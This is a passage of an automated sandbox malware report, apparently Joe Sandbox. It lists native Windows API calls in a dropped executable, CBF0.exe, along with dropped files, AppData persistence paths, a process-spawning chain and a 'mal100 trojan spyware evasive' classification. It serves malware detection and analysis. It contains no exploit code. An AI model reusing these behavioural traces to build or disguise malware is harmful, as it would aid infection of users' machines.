Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5F60E9 ZwOpenKey,ZwClose,ZwClose, 29_2_6B5F60E9
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56E090 RtlWow64EnableFsRedirectionEx,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent, 29_2_6B56E090
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58A890 ZwQueryDebugFilterState, 29_2_6B58A890
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589890 ZwFsControlFile, 29_2_6B589890
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58108B ZwClose, 29_2_6B58108B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B543880 TpSetWaitEx,RtlAllocateHeap,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,TpSetWaitEx, 29_2_6B543880
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57A080 RtlDeleteCriticalSection,RtlAcquireSRWLockExclusive,RtlDeleteCriticalSection,RtlDeleteCriticalSection,ZwClose,RtlDeleteCriticalSection, 29_2_6B57A080
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57F0BF ZwOpenFile,RtlFreeHeap,ZwQueryVolumeInformationFile,RtlAllocateHeap,memcpy,ZwClose,ZwClose,RtlFreeHeap, 29_2_6B57F0BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58B0B0 ZwTraceControl, 29_2_6B58B0B0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5718B9 ZwCreateTimer2,ZwCreateWaitCompletionPacket,ZwAssociateWaitCompletionPacket,ZwClose, 29_2_6B5718B9
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56F0AE ZwSetInformationWorkerFactory, 29_2_6B56F0AE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5F60A2 ZwQueryInformationFile, 29_2_6B5F60A2
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D5F5F RtlInitUnicodeString,ZwOpenFile,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlAllocateHeap,RtlInitUnicodeString,ZwQueryDirectoryFile,RtlAllocateHeap,memcpy,RtlFreeHeap,ZwClose, 29_2_6B5D5F5F
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589750 ZwQueryInformationThread, 29_2_6B589750
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B618F6A RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6B618F6A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B580F48 ZwOpenKey,ZwClose,ZwClose,ZwCreateKey,RtlInitUnicodeStringEx,ZwSetValueKey,RtlInitUnicodeStringEx,ZwSetValueKey,ZwClose, 29_2_6B580F48
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589740 ZwOpenThreadToken, 29_2_6B589740
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57174B ZwFreeVirtualMemory,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory, 29_2_6B57174B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589F70 ZwCreateIoCompletion, 29_2_6B589F70
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589770 ZwSetInformationFile, 29_2_6B589770
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5FCF70 RtlpGetUserOrMachineUILanguage4NLS,RtlInitUnicodeString,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,ZwClose, 29_2_6B5FCF70
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D176C ZwOpenEvent,ZwWaitForSingleObject,ZwClose, 29_2_6B5D176C
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B546F60 RtlGetPersistedStateLocation,ZwOpenKey,memcpy,RtlGetPersistedStateLocation,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwQueryValueKey,RtlExpandEnvironmentStrings,memcpy,ZwClose,ZwClose,RtlFreeHeap, 29_2_6B546F60
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58AF60 ZwSetTimer2, 29_2_6B58AF60
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57CF6A memcpy,memcpy,RtlDosPathNameToRelativeNtPathName_U,ZwOpenFile,memcpy,RtlFreeHeap,RtlDeleteBoundaryDescriptor,DbgPrintEx,DbgPrintEx,DbgPrintEx,ZwClose,RtlFreeHeap,DbgPrintEx,memcpy,DbgPrintEx,ZwClose, 29_2_6B57CF6A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589710 ZwQueryInformationToken, 29_2_6B589710
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D6715 memset,memcpy,ZwTraceEvent, 29_2_6B5D6715
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B579702 RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwReleaseWorkerFactoryWorker, 29_2_6B579702
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid, 29_2_6B57E730
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589730 ZwQueryVirtualMemory, 29_2_6B589730
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5FCF30 ZwAlertThreadByThreadId, 29_2_6B5FCF30
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57DFDF RtlWakeAddressAllNoFence,ZwAlertThreadByThreadId,RtlWakeAddressAllNoFence, 29_2_6B57DFDF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58AFD0 ZwShutdownWorkerFactory, 29_2_6B58AFD0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54F7C0 EtwNotificationUnregister,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwClose,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,EtwNotificationUnregister, 29_2_6B54F7C0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5897C0 ZwTerminateProcess, 29_2_6B5897C0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57D7CA RtlImageNtHeader,RtlFreeHeap,ZwCreateSection,ZwMapViewOfSection,ZwClose,RtlImageNtHeader,ZwClose,RtlFreeHeap,ZwClose,ZwClose,ZwUnmapViewOfSection, 29_2_6B57D7CA
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B550FFD RtlInitUnicodeString,ZwQueryValueKey, 29_2_6B550FFD
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D0FEC ZwDuplicateObject,ZwDuplicateObject, 29_2_6B5D0FEC
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5737EB RtlImageNtHeader,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,ZwCreateIoCompletion,ZwCreateWorkerFactory,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSetInformationWorkerFactory, 29_2_6B5737EB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57FF9C RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlInitUnicodeString, 29_2_6B57FF9C
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5F5F87 ZwUnmapViewOfSection, 29_2_6B5F5F87
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D5780 DbgPrompt,ZwWow64DebuggerCall, 29_2_6B5D5780
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B542FB0 RtlDestroyHeap,RtlDeleteCriticalSection,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlDestroyHeap,DbgPrint,DbgPrint,DbgPrint,RtlDebugPrintTimes,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6B542FB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5897A0 ZwUnmapViewOfSection, 29_2_6B5897A0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B583FA0 RtlGetLocaleFileMappingAddress,ZwInitializeNlsFiles,RtlGetLocaleFileMappingAddress,ZwUnmapViewOfSection, 29_2_6B583FA0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58B650 RtlUnhandledExceptionFilter,ZwTerminateProcess, 29_2_6B58B650
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589650 ZwQueryValueKey, 29_2_6B589650
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D6652 ZwClose,RtlAllocateHeap,memcpy,ZwUnmapViewOfSection, 29_2_6B5D6652
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58B640 RtlUnhandledExceptionFilter,ZwTerminateProcess, 29_2_6B58B640
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58AE70 ZwSetInformationWorkerFactory, 29_2_6B58AE70
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589670 ZwQueryInformationProcess, 29_2_6B589670
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57BE62 ZwProtectVirtualMemory,RtlGetCurrentTransaction,RtlGetCurrentTransaction, 29_2_6B57BE62
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B613E22 ZwTraceControl,RtlNtStatusToDosError,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error, 29_2_6B613E22
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B582E1C RtlInitializeCriticalSectionEx,ZwDelayExecution, 29_2_6B582E1C
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D2E14 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6B5D2E14
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54C600 LdrQueryImageFileKeyOption,RtlInitUnicodeStringEx,ZwQueryValueKey,LdrQueryImageFileKeyOption,RtlFreeHeap,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,RtlUnicodeStringToInteger,memcpy, 29_2_6B54C600
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5FFE3F memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6B5FFE3F
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54B630 ZwWaitForKeyedEvent, 29_2_6B54B630
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589E30 ZwCancelWaitCompletionPacket, 29_2_6B589E30
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589E20 ZwCancelTimer2, 29_2_6B589E20
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5466D4 RtlInitUnicodeString,ZwQueryValueKey, 29_2_6B5466D4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B579ED0 RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockShared,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,ZwWaitForAlertByThreadId, 29_2_6B579ED0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5896D0 ZwCreateKey, 29_2_6B5896D0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B542ED8 ZwWaitForAlertByThreadId,ZwWaitForAlertByThreadId, 29_2_6B542ED8
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5896C0 ZwSetInformationProcess, 29_2_6B5896C0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54B6F0 EtwEventWriteNoRegistration,ZwTraceEvent,RtlNtStatusToDosError, 29_2_6B54B6F0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D16FA ZwQueryWnfStateNameInformation,ZwUpdateWnfStateData,EtwEventWriteNoRegistration, 29_2_6B5D16FA
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B59DEF0 RtlRaiseException,RtlCaptureContext,ZwRaiseException,RtlRaiseStatus, 29_2_6B59DEF0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5576FE RtlInitUnicodeString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,ZwOpenKey,ZwClose, 29_2_6B5576FE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56E6F9 ZwAlpcSetInformation, 29_2_6B56E6F9
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B618ED6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6B618ED6
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5896E0 ZwFreeVirtualMemory, 29_2_6B5896E0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5FBE9B RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive, 29_2_6B5FBE9B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57DE9E RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwUnsubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap, 29_2_6B57DE9E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B542E9F ZwCreateEvent,ZwClose, 29_2_6B542E9F
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B543E80 RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6B543E80
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B613EBC ZwTraceControl,RtlNtStatusToDosError,RtlSetLastWin32Error, 29_2_6B613EBC
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56E6B0 RtlSetThreadWorkOnBehalfTicket,memcmp,ZwSetInformationThread,RtlSetThreadWorkOnBehalfTicket, 29_2_6B56E6B0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D2EA3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6B5D2EA3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B606D61 ZwAllocateVirtualMemoryEx, 29_2_6B606D61
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D1D43 ZwQueryInformationThread, 29_2_6B5D1D43
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589D70 ZwAlpcQueryInformation, 29_2_6B589D70
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D1570 ZwQuerySystemInformation,RtlInitUnicodeString,memset,ZwAlpcConnectPort,ZwAlpcSendWaitReceivePort,ZwClose, 29_2_6B5D1570
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B611D55 ZwFreeVirtualMemory,RtlWakeAddressAllNoFence, 29_2_6B611D55
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D1D6A ZwWaitForMultipleObjects, 29_2_6B5D1D6A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B618D34 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6B618D34
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D1D0B ZwSetInformationProcess, 29_2_6B5D1D0B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B574D3B memset,RtlRunOnceExecuteOnce,ZwTraceControl,memcmp,RtlNtStatusToDosError,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap, 29_2_6B574D3B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B571520 RtlInitializeCriticalSectionEx,RtlInitializeCriticalSectionEx,RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6B571520
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589520 ZwWaitForSingleObject, 29_2_6B589520
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5FFD22 ZwQueryInformationProcess,RtlUniform, 29_2_6B5FFD22
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5445D0 RtlGetThreadWorkOnBehalfTicket,RtlGetThreadWorkOnBehalfTicket,ZwQueryInformationThread, 29_2_6B5445D0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5895D0 ZwClose, 29_2_6B5895D0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5FFDD3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6B5FFDD3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56EDC4 ZwCancelWaitCompletionPacket, 29_2_6B56EDC4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B544DC0 RtlpUnWaitCriticalSection,RtlWakeAddressAllNoFence,RtlRaiseStatus,TpWaitForAlpcCompletion,RtlpUnWaitCriticalSection,ZwSetEvent,TpWaitForAlpcCompletion,ZwAlpcQueryInformation, 29_2_6B544DC0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5895C0 ZwSetEvent, 29_2_6B5895C0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5495F0 TpSetPoolMinThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMinThreads, 29_2_6B5495F0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5FBDFA RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive, 29_2_6B5FBDFA
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5895F0 ZwQueryInformationFile, 29_2_6B5895F0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589DE0 ZwAssociateWaitCompletionPacket, 29_2_6B589DE0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B543591 ZwSetInformationFile, 29_2_6B543591
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B55DD80 RtlAcquireSRWLockShared,ZwQueryVirtualMemory,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlRaiseStatus,RtlAddressInSectionTable,RtlImageDirectoryEntryToData, 29_2_6B55DD80
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B60B581 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6B60B581
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B601582 ZwTraceEvent, 29_2_6B601582
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5895B0 ZwSetInformationThread, 29_2_6B5895B0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589DB0 ZwAlpcSetInformation, 29_2_6B589DB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5465A0 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion, 29_2_6B5465A0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589DA0 ZwAlpcSendWaitReceivePort, 29_2_6B589DA0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B545450 RtlClearThreadWorkOnBehalfTicket,memcmp,RtlClearThreadWorkOnBehalfTicket,ZwSetInformationThread, 29_2_6B545450
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D1C49 ZwQueryInformationProcess, 29_2_6B5D1C49
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B618C75 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6B618C75
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589C40 ZwAllocateVirtualMemoryEx, 29_2_6B589C40
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589C70 ZwAlpcConnectPort, 29_2_6B589C70
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B585C70 TpSetPoolMaxThreadsSoftLimit,ZwSetInformationWorkerFactory, 29_2_6B585C70
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D1C76 ZwQueryInformationProcess, 29_2_6B5D1C76
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57AC7B ZwFreeVirtualMemory,RtlFillMemoryUlong,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint, 29_2_6B57AC7B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56746D RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 29_2_6B56746D
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5F3C60 RtlFlushSecureMemoryCache,ZwQueryVirtualMemory, 29_2_6B5F3C60
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B580413 ZwUnmapViewOfSection, 29_2_6B580413
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56FC39 ZwAssociateWaitCompletionPacket, 29_2_6B56FC39
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B601411 ZwTraceEvent, 29_2_6B601411
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B618C14 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6B618C14
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58A420 ZwGetNlsSectionPtr, 29_2_6B58A420
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B542CDB RtlFreeHeap,ZwClose,ZwSetEvent, 29_2_6B542CDB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57CCC0 memcpy,RtlGetNtSystemRoot,RtlInitUnicodeString,memcpy,ZwOpenKey,ZwClose,ZwEnumerateKey,DbgPrintEx,DbgPrintEx,DbgPrintEx, 29_2_6B57CCC0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B6014FB memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6B6014FB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5F64FB ZwOpenKey,ZwQueryValueKey,RtlEqualUnicodeString,RtlEqualUnicodeString,RtlEqualUnicodeString,ZwClose, 29_2_6B5F64FB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B618CD6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6B618CD6
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54F4E3 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent, 29_2_6B54F4E3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D1CE4 ZwQueryInformationProcess, 29_2_6B5D1CE4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B614CAB ZwTraceControl, 29_2_6B614CAB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5C3C93 wcschr,RtlInitUnicodeString,wcstoul,RtlAnsiStringToUnicodeString,RtlCompareUnicodeString,ZwProtectVirtualMemory,DbgPrintEx,RtlFreeUnicodeString, 29_2_6B5C3C93
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B619CB3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6B619CB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58A480 ZwInitializeNlsFiles, 29_2_6B58A480
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604496 ZwAllocateVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint, 29_2_6B604496
PE file does not import any functions
Source: F1AC.exe.10.dr Static PE information: No import functions for PE file found
Source: C066.exe.10.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C8FE.exe.10.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: DEDC.exe.10.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: E64F.exe.10.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C295.exe.10.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: B096.exe.10.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: CAC5.exe.10.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: CBF0.exe.10.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: CD17.exe.10.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: FD36.exe.10.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Md0q201V1D.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\gbhudtb
Source: 1105.tmp.29.dr Binary string: \Device\IPT
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@74/167@62/20
Source: Md0q201V1D.exe Joe Sandbox Cloud Basic: Detection: clean Score: 0
Source: C:\Users\user\Desktop\Md0q201V1D.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\Md0q201V1D.exe 'C:\Users\user\Desktop\Md0q201V1D.exe'
Source: C:\Users\user\Desktop\Md0q201V1D.exe Process created: C:\Users\user\Desktop\Md0q201V1D.exe 'C:\Users\user\Desktop\Md0q201V1D.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\21.exe C:\Users\user\AppData\Local\Temp\21.exe
Source: C:\Users\user\AppData\Local\Temp\21.exe Process created: C:\Users\user\AppData\Local\Temp\21.exe C:\Users\user\AppData\Local\Temp\21.exe
Source: C:\Users\user\AppData\Roaming\gbhudtb Process created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
Source: unknown Process created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
